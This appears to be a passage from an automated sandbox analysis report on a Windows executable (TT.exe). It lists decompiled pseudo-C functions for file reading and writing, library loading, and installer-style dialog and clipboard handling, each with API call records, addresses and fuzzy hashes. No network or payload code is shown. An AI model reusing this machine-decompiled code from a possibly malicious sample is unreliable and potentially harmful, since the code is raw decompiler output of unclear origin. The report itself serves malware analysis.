				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x4247b8;
					 *0x41f8fc = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E0040329A(4);
				if(_t22 >= 0) {
					_t24 = E00405E39( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x41f8fc =  *0x41f8fc + 4;
						_t36 = E0040329A(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x41f8fc =  *0x41f8fc + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E00405E39( *0x40a01c, 0x4138f8, _t28) == 0) {
											goto L18;
										}
										_t30 = E00405E68(_a8, 0x4138f8, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x41f8fc =  *0x41f8fc + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}














                                                0x00403196
                                                0x0040319f
                                                0x004031a8
                                                0x004031ac
                                                0x004031b7
                                                0x004031b7
                                                0x004031bf
                                                0x004031c6
                                                0x004031d8
                                                0x004031df
                                                0x00403284
                                                0x00403284
                                                0x00000000
                                                0x004031e5
                                                0x004031e8
                                                0x004031f4
                                                0x004031f8
                                                0x00403292
                                                0x00403292
                                                0x004031fe
                                                0x00403201
                                                0x00403260
                                                0x00403266
                                                0x00403268
                                                0x00403268
                                                0x0040327a
                                                0x00403282
                                                0x00403289
                                                0x0040328c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403203
                                                0x00403206
                                                0x00000000
                                                0x0040320c
                                                0x00403211
                                                0x00403218
                                                0x0040321b
                                                0x0040321d
                                                0x0040321d
                                                0x0040322a
                                                0x00403234
                                                0x00000000
                                                0x00000000
                                                0x0040323d
                                                0x00403244
                                                0x0040325c
                                                0x00403286
                                                0x00403286
                                                0x00403246
                                                0x00403246
                                                0x00403249
                                                0x0040324c
                                                0x00403252
                                                0x00403258
                                                0x00000000
                                                0x0040325a
                                                0x00000000
                                                0x0040325a
                                                0x00403258
                                                0x00000000
                                                0x00403244
                                                0x00000000
                                                0x00403211
                                                0x00403206
                                                0x00403201
                                                0x004031f8
                                                0x004031df
                                                0x00403294
                                                0x00403297

                                                APIs
                                                • SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,0040313E,000000FF,00000000,00000000,0040A130,?), ref: 004031B7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 01e98dbf49a9efced9094fa2c3d361a4303186e46b1d46872f44f8f4f7fda8b1
                                                • Instruction ID: 417efc13fc3ab0d651ced5ea1d77d103914e3086752ee655c490bf772f36c9c7
                                                • Opcode Fuzzy Hash: 01e98dbf49a9efced9094fa2c3d361a4303186e46b1d46872f44f8f4f7fda8b1
                                                • Instruction Fuzzy Hash: 6A316D30100319FFDB109F96ED48A9A7FA8EB04359B20847FF914E6190D338DB519BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 59%
                                                			E00401389(signed int _a4, struct HWND__* _a11) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x424790;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a11 != 0) {
						 *0x423f2c =  *0x423f2c + _t12;
						SendMessageA(_a11, 0x402, MulDiv( *0x423f2c, 0x7530,  *0x423f14), 0);
					}
				}
				return 0;
			}










                                                0x0040138a
                                                0x004013fa
                                                0x0040139b
                                                0x004013a0
                                                0x00000000
                                                0x00000000
                                                0x004013a2
                                                0x004013a3
                                                0x004013ad
                                                0x00000000
                                                0x00401404
                                                0x004013b0
                                                0x004013b7
                                                0x004013bd
                                                0x004013be
                                                0x004013c0
                                                0x004013c2
                                                0x004013b9
                                                0x004013b9
                                                0x004013ba
                                                0x004013ba
                                                0x004013c9
                                                0x004013cb
                                                0x004013f4
                                                0x004013f4
                                                0x004013c9
                                                0x00000000

                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: bd8df2336641fef3ba5122bb8ee68c85eddc30aa2a367a6b625e197710042414
                                                • Instruction ID: 619251f0f573ab9f47b456b69b18ba8f896b0ae65f75ba169e48b75275ff5987
                                                • Opcode Fuzzy Hash: bd8df2336641fef3ba5122bb8ee68c85eddc30aa2a367a6b625e197710042414
                                                • Instruction Fuzzy Hash: F301D131B242109BE7194B38AE04B2A36A8E754315F11813AF855F61F1DA78CC129B4C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406631, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00406631(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a258);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
				}
				_t5 = E004065C3(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                0x00406639
                                                0x0040663c
                                                0x00406643
                                                0x0040664b
                                                0x00406657
                                                0x00000000
                                                0x0040665e
                                                0x0040664e
                                                0x00406655
                                                0x00000000
                                                0x00406666
                                                0x00000000

                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0040665E
                                                  • Part of subcall function 004065C3: GetSystemDirectoryA.KERNEL32 ref: 004065DA
                                                  • Part of subcall function 004065C3: wsprintfA.USER32 ref: 00406613
                                                  • Part of subcall function 004065C3: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406627
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                • String ID:
                                                • API String ID: 2547128583-0
                                                • Opcode ID: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                • Instruction ID: e63780c8bf1f0faf28ba6c6d4be53ddd5ff0707a9bdd482d1e4d5d99537df4e3
                                                • Opcode Fuzzy Hash: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                • Instruction Fuzzy Hash: 94E086326042106AD6106B70AE04C7773A89F84750702483EF546F2150D7399C3596AD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405DC1, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 68%
                                                			E00405DC1(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                0x00405dc5
                                                0x00405dd2
                                                0x00405de7
                                                0x00405ded

                                                APIs
                                                • GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\TT.exe,80000000,00000003), ref: 00405DC5
                                                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                                • Instruction ID: c1cd633b288b309c16b37b55694bd397a2d2f3fd27c3ea135bedd35eac3c4d3c
                                                • Opcode Fuzzy Hash: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                                • Instruction Fuzzy Hash: D9D09E31254602AFEF0D8F20DE16F2E7AA2EB84B00F11952CB682944E2DA715819AB19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405D9C, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405D9C(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                0x00405da1
                                                0x00405da7
                                                0x00405dac
                                                0x00405db5
                                                0x00405db5
                                                0x00405dbe

                                                APIs
                                                • GetFileAttributesA.KERNELBASE(?,?,004059B4,?,?,00000000,00405B97,?,?,?,?), ref: 00405DA1
                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DB5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                • Instruction ID: 45e1b313f31d266de6e0d804bcdac0c4d644dd7a0ef1fc7463663643c81ebfd1
                                                • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                • Instruction Fuzzy Hash: F9D0A932000021ABD2002728EE0C88BBB91DB00270702CA36FCA4A22B2DB300C129A98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405892, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405892(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                0x00405898
                                                0x004058a0
                                                0x00000000
                                                0x004058a6
                                                0x00000000

                                                APIs
                                                • CreateDirectoryA.KERNELBASE(?,00000000,00403454,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405898
                                                • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058A6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CreateDirectoryErrorLast
                                                • String ID:
                                                • API String ID: 1375471231-0
                                                • Opcode ID: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                                                • Instruction ID: ae32aa403121d558109e23f4dadc85ee7ba81b7b8263ff8d49f56a55f4155d83
                                                • Opcode Fuzzy Hash: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                                                • Instruction Fuzzy Hash: D5C04C316045019BE6506B319F08B1B7A549F50741F158439A78AE41E4DA388465D92D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405E68, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405E68(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                0x00405e6c
                                                0x00405e7c
                                                0x00405e84
                                                0x00000000
                                                0x00405e8b
                                                0x00000000
                                                0x00405e8d

                                                APIs
                                                • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0040C4C6,0040B8F8,0040339A,0040B8F8,0040C4C6,004138F8,00004000,?,00000000,004031C4,00000004), ref: 00405E7C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                • Instruction ID: 83138c6b6f61fe56512c00d99342466dd547819508ce818909ec7b1084a3bb5f
                                                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                • Instruction Fuzzy Hash: 48E0463221021AABDF109F60CC04AAB3B6CEB00260F404432FAA4E2140E234E9208AE4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405E39, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405E39(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                0x00405e3d
                                                0x00405e4d
                                                0x00405e55
                                                0x00000000
                                                0x00405e5c
                                                0x00000000
                                                0x00405e5e

                                                APIs
                                                • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,004138F8,0040B8F8,00403416,0040A130,0040A130,0040331A,004138F8,00004000,?,00000000,004031C4), ref: 00405E4D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                                                • Instruction ID: cce2834e44819e2e6951819013f8ba23c93adc22c6858a83ce884f24d90f4801
                                                • Opcode Fuzzy Hash: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                                                • Instruction Fuzzy Hash: BFE0463220061AABCF119F60CC00AEB3B6CEB046E0F044832B955E2040D230EA209BE8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403419, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00403419(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                0x00403427
                                                0x0040342d

                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403117,?), ref: 00403427
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 0040548D, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 96%
                                                			E0040548D(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x423f24; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405421, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E004062BB(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x420d50;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x423f0c - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x424748, 8);
							__eflags =  *0x4247ec - _t150;
							if( *0x4247ec == _t150) {
								E0040534F( *((intOrPtr*)( *0x420528 + 0x34)), _t150);
							}
							E00404285(1);
							goto L25;
						}
						 *0x420120 = 2;
						E00404285(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404313(_t157, _a12, _a16);
						}
						ShowWindow( *0x423f10, _t150);
						ShowWindow(_v8, 8);
						E004042E1(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x424754;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x423f10 = GetDlgItem(_a4, 0x403);
				 *0x423f08 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x423f24 = _t128;
				_v8 = _t128;
				E004042E1( *0x423f10);
				 *0x423f14 = E00404BD2(4);
				 *0x423f2c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004042AC(_a4);
				if(( *0x42475c & 0x00000003) != 0) {
					ShowWindow( *0x423f10, _t150);
					if(( *0x42475c & 0x00000002) != 0) {
						 *0x423f10 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E004042E1( *0x423f08);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42475c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}



































                                                0x00405493
                                                0x0040549b
                                                0x0040549e
                                                0x004054a6
                                                0x004054a9
                                                0x00405638
                                                0x0040563e
                                                0x00405662
                                                0x00405662
                                                0x0040566e
                                                0x00405674
                                                0x00405696
                                                0x00405696
                                                0x0040569c
                                                0x004056f1
                                                0x004056f1
                                                0x004056f4
                                                0x00000000
                                                0x00000000
                                                0x004056f6
                                                0x004056f9
                                                0x004056fc
                                                0x00000000
                                                0x00000000
                                                0x00405706
                                                0x0040570c
                                                0x0040570e
                                                0x00405711
                                                0x0040580e
                                                0x00000000
                                                0x0040580e
                                                0x00405720
                                                0x0040572c
                                                0x00405735
                                                0x0040573c
                                                0x00405740
                                                0x00405743
                                                0x0040574c
                                                0x00405752
                                                0x00405755
                                                0x00405755
                                                0x00405765
                                                0x0040576b
                                                0x0040576e
                                                0x00405779
                                                0x00405779
                                                0x0040577a
                                                0x0040577d
                                                0x00405784
                                                0x0040578b
                                                0x00405793
                                                0x00405793
                                                0x004057a1
                                                0x004057a7
                                                0x004057aa
                                                0x004057aa
                                                0x004057b1
                                                0x004057b7
                                                0x004057c0
                                                0x004057c7
                                                0x004057d0
                                                0x004057d2
                                                0x004057d5
                                                0x004057e4
                                                0x004057e6
                                                0x004057e9
                                                0x004057ea
                                                0x004057ed
                                                0x004057ee
                                                0x004057ef
                                                0x004057ef
                                                0x004057f7
                                                0x00405802
                                                0x00405808
                                                0x00405808
                                                0x00000000
                                                0x0040576e
                                                0x0040569e
                                                0x004056a4
                                                0x004056d2
                                                0x004056d4
                                                0x004056da
                                                0x004056e5
